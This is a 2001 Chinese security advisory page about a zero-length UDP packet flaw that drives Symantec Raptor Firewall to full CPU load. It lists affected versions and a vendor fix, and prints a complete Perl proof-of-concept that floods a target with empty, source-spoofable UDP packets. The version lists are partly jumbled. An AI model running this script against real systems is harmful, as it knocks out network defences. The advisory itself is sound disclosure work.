首页 -> 安全研究
安全研究
安全漏洞
Raptor Firewall 零长度UDP包资源耗尽漏洞
发布日期:2001-11-05
更新日期:2001-11-08
受影响系统:
不受影响系统:
Symantec Raptor Firewall 4.0.0 HP-UX
- HP HP-UX 10.20
Symantec Raptor Firewall 5.0.3 Windows NT
Symantec Raptor Firewall 6.0.2 Windows NT
- Microsoft Windows NT 4.0
Symantec Raptor Firewall 6.0.2 Solaris
- Sun Solaris 2.6
Symantec Raptor Firewall 6.0.3 HP-UX
- HP HP-UX 11.0
Symantec Raptor Firewall 6.5 Windows NT
- Microsoft Windows NT 4.0
Symantec VelociRaptor 1.1,
Symantec VelociRaptor 1.0
描述:
Symantec Enterprise Firewall 6.5.2 NT/2000
Symantec Raptor Firewall 6.5.1 Solaris
- Sun Solaris 2.6
- Sun Solaris 7.0
Symantec Raptor Firewall 6.5.3 Solaris
- Sun Solaris 2.6
- Sun Solaris 7.0
BUGTRAQ ID: 3509
Raptor Firewall 是一款商业防火墙产品,是由Symantec 公司发布的。该软件存在一
个安全问题,可能导致资源耗尽。
通过发送零长度的UDP包到该防火墙,可以导致CPU占用率100%,放置该防火墙的主机速
度变慢。
<*来源:Max Moser (mmo@phase1.ch)
链接:http://www.remote-exploit.org/downloads.php
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
###################################
# This Code is for education only #
###################################
# Greetings to kitchen from #perl on irc openproject.net
# For the help on some perl questions.
# Firewalls are hard on the outside and crunchy on the inside
#
# The Rapor Firewall UDP-GSP (UDP-Proxy) gets 100% CPU load
# When getting UDP-Packets with no Data init
#
# Written 21.Jun 2001 by Max Moser mmo@remote-exploit.org
#
# http://www.remote-exploit.org
#
use Net::RawIP;
use Getopt::Long;
GetOptions('src=s','dst=s','num=i');
if (!$opt_src | !$opt_dst | !$opt_num ){
print "\nUsage parameters for ".$0.":\n";
print "\t--src\t IP-Sourceaddress\n";
print "\t--dst\t IP-Destinationaddress\n";
print "\t--num\t Numer of UDP packets to send\n";
print "\nExample:\n";
print "\t".$0." --src=192.168.0.1 --dst=192.168.0.354 --num=1000\n\n\n";
exit(1);
};
# Some defines
$| = 1;
@anim= ("\\","|","/","-","\\","|","/","-");
$source=$opt_src;
$destination=$opt_dst;
$numpack=$opt_num;
print "\n\n\tSending packets now ";
for($x=0;$x<$numpack;$x=$x+1){
my $sport=(rand(65534)+1);
my $dport=(rand(1024)+1);
my $c=new Net::RawIP({udp=>{source=>$sport,dest=>$dport}});
$c->set({ip=>{saddr=>$source,daddr=>$destination},{udp}});
$c->send;
undef $c;
for ($y=0;$y<8;$y=$y+1){
print "\b" . $anim[$y];
select (undef,undef,undef,0.01);
if ($y==8){ $y=0};
};
};
print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n";
建议:
厂商补丁:
我们建议使用此软件的用户到厂商的主页获取不存在该问题的版本:
all.html>http://www.symantec.com/techsupp/ent/raptor_firewall/files_raptor_firew
all.html
浏览次数:6081
严重程度:0(网友投票)
绿盟科技给您安全的保障